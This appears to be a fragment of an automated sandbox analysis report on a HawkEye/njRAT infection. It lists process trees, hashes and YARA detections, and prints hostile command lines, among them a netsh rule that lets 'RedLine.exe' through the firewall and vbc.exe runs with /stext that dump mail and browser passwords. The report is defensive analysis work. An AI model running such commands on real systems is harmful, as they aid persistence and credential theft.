                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 89%, ReversingLabs

                                                                                        General

                                                                                        Start time:10:14:03
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                        Imagebase:0xd40000
                                                                                        File size:533504 bytes
                                                                                        MD5 hash:C4E4A84909D8FF8DD222B8252365985D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000002.401046205.000000000384C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000011.00000002.404757917.0000000007F20000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000011.00000002.404673570.0000000007D50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000002.401457902.00000000043D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000002.402244108.0000000004591000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                        General

                                                                                        Start time:10:14:08
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\user32dll.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\user32dll.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:46132 bytes
                                                                                        MD5 hash:D0F09063EA6922ACBFC734145FA48203
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Visual Basic
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 83%, Metadefender, Browse
                                                                                        • Detection: 93%, ReversingLabs

                                                                                        General

                                                                                        Start time:10:14:09
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:taskkill /f /im "user32dll.exe"
                                                                                        Imagebase:0xee0000
                                                                                        File size:74752 bytes
                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:09
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:14
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE
                                                                                        Imagebase:0x7ff603860000
                                                                                        File size:92672 bytes
                                                                                        MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:15
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:16
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:dw20.exe -x -s 2528
                                                                                        Imagebase:0x10000000
                                                                                        File size:33936 bytes
                                                                                        MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:21
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                                                                                        Imagebase:
                                                                                        File size:1171592 bytes
                                                                                        MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000019.00000002.567099655.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                        General

                                                                                        Start time:10:14:21
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                        Imagebase:
                                                                                        File size:1171592 bytes
                                                                                        MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        General

                                                                                        Start time:10:14:23
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                        Imagebase:0x400000
                                                                                        File size:1171592 bytes
                                                                                        MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000000.395296595.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.412155949.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000000.393916948.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                        Reset < >